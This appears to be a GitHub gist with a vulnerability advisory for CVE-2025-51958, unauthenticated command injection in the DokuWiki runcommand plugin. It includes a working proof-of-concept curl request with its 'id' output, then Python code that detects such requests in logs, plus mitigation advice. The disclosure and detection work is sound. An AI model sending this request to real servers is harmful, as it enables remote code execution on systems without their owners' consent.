@NtustLin
Last active February 23, 2026 06:22
> CVE-2025-51958
> [Suggested description]
> The runcommand plugin (last updated 2014-04-01) for DokuWiki allows anyone, without authentication, to execute arbitrary system commands,
> related to lib/plugins/runcommand/postaction.php.
>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Command Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Alessandro Celli
>
> ------------------------------------------
>
> [Affected Product Code Base]
> dokuwiki/lib/plugins/runcommand/postaction.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [CVSS]
> AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
> Overall CVSS Score: 9.8
>
> ------------------------------------------
>
> [Reference]
> https://www.dokuwiki.org/plugin:runcommand
> https://download.dokuwiki.org/
>
> ------------------------------------------
>
> [Discoverer]
> LIN YU CHEN (CHT Security Co Ltd)
>
> ------------------------------------------
>
> [POC]
> Request:
> curl http://{IP}/lib/plugins/runcommand/postaction.php -X POST -d "rcObjectId=1&outputType1=text&command1=id"
> Response:
> <pre>
> uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),116(netdev)
> </pre>
>
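The PoC above shows the request shape a defender needs to recognise: an unauthenticated POST to the plugin's postaction.php carrying a `command<N>` form parameter. The following detection logic is an added example (not part of the gist or of DokuWiki) that flags such requests in captured HTTP records; the record format and the sample records are constructed here, and the function names are chosen for this example. Plain access logs do not include POST bodies, so when only the request line is available the check falls back to flagging any POST to the endpoint, which is reasonable on a wiki that does not use the plugin at all.

```python
"""Flag requests matching the runcommand postaction.php pattern
(added detection example, not advisory or DokuWiki code)."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint named in the advisory's [Affected Product Code Base] section.
VULN_PATH = "/lib/plugins/runcommand/postaction.php"
# The PoC uses command1; the plugin numbers its parameters, so match any.
COMMAND_PARAM = re.compile(r"^command\d+$")


def classify_request(method: str, target: str, body: str | None) -> str | None:
    """Return a reason string if the request looks like an attempt against
    the endpoint, otherwise None.

    body is the raw form body if it was captured (e.g. by a WAF or reverse
    proxy), or None if only the access-log request line is available."""
    if urlsplit(target).path.lower() != VULN_PATH:
        return None
    if method.upper() != "POST":
        # The endpoint is only exploitable via POST; GETs are noise.
        return None
    if body is None:
        return "POST to runcommand postaction.php (body not captured)"
    params = parse_qs(body, keep_blank_values=True)
    cmd_keys = sorted(k for k in params if COMMAND_PARAM.match(k))
    if cmd_keys:
        return f"POST to runcommand postaction.php with {', '.join(cmd_keys)}"
    return None


def scan(records: list[dict]) -> list[tuple[str, str]]:
    """Run classify_request over (constructed) records; return (src, reason)."""
    hits = []
    for r in records:
        reason = classify_request(r["method"], r["target"], r.get("body"))
        if reason:
            hits.append((r["src"], reason))
    return hits


# Constructed sample records for this example; not real traffic.
SAMPLE_RECORDS = [
    {"src": "198.51.100.7", "method": "POST", "target": VULN_PATH,
     "body": "rcObjectId=1&outputType1=text&command1=id"},
    {"src": "198.51.100.7", "method": "POST",
     "target": VULN_PATH + "?x=1", "body": None},  # body not logged
    {"src": "203.0.113.9", "method": "GET", "target": "/doku.php?id=start",
     "body": None},
    {"src": "203.0.113.9", "method": "POST", "target": "/doku.php",
     "body": "do=login&u=alice&p=secret"},
]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE_RECORDS):
        print(f"{src}\t{reason}")
```

Because the endpoint needs no authentication, the practical mitigation is removing or disabling the plugin (it has not been updated since 2014, as the advisory notes) and denying direct web access to `lib/plugins/runcommand/`; the detection above is for confirming whether the path was reached before that was done.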